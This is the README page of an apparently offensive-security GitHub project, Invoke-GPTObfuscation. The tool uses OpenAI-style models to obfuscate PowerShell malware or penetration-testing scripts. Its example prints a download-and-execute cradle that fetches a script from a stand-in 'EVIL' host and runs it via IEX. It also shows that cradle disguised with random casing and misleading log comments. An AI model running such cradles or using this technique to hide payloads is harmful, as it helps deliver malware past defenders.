Skip to content

Powershell implementation of a novel technique. Invoke-GPTObfuscation is a PowerShell Obfuscator that utilizes OpenAI (and other APIs) to obfuscate your PowerShell penetration testing code, malware, or any other sensitive script.

License

Notifications You must be signed in to change notification settings

hwvs/Invoke-GPTObfuscation

Repository files navigation

Invoke-GPTObfuscation

Invoke-GPTObfuscation is a PowerShell Obfuscator that utilizes OpenAI or compatible text-completion models to obfuscate your PowerShell penetration testing code, malware, or any other sensitive script. This code is intended for Educational & Research purposes only.

This is mostly demonstrational, and will frequently create invalid code. You'll need to come up with a better prompt to get good results. If you make any improvements, please consider submitting a pull request!

With better prompt templates, or better models (GPT-4), this tool can achieve much more impressive results. I've found GPT-4 can perform impressive code mutations that completely change the structure of the code.

(TODO) Future Improvements:

  • Convert variable names to placeholder-symbols via Regex to maintain across code (eg: $, $)
  • Validate syntax, optionally re-generate if there is a syntax error
  • Instead of building blocks line-by-line, try to build blocks by { context }
  • Add in options into the prompt that the model can try to replicate
  • Add support for other providers/API (Anthropic/Claude?)

Credits

Author: Hunter Watson

License: Mozilla Public License 2.0


Usage

Run the CLI tool (in a powershell window): ./Invoke-GPTObfuscation.ps1

Use the module in your code

# load the module however is easiest for you, eg:
$module_path = $pwd.Path + "/Invoke-GPTObfuscation.psm1"
Invoke-Expression (Get-Content $module_path -Raw)
  
#...

$script_obfuscated = Invoke-GPTObfuscation -ScriptBlock $script -PromptTemplateFile $prompt_template_path -Verbose $true

Results

Before:

$ie=New-Object -comobject InternetExplorer.Application;
$ie.visible=$False;
$ie.navigate('http://EVIL/evil.ps1');
start-sleep -s 5;
$r=$ie.Document.body.innerHTML;
$ie.quit();
IEX $r

After:

# generating Log files
$Strawberry = New-Object -CoMObjEcT inTErnETeXPLOreR.Application;
$strawberry.vISiblE = $fAlSe;
$STRaWbeRRy.NAVigatE('HttP://evIl/evil.ps1');
stArT-SlEEp -s 5;

# Updating log directory path
$r = $StrawberrY.DoCument.BoDy.InneRHTML;

# Cleanup
$strawBerRy.quiT();

# Execute payload
IeX $R

(Note: This result was cherry-picked)

About

Powershell implementation of a novel technique. Invoke-GPTObfuscation is a PowerShell Obfuscator that utilizes OpenAI (and other APIs) to obfuscate your PowerShell penetration testing code, malware, or any other sensitive script.

Topics

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published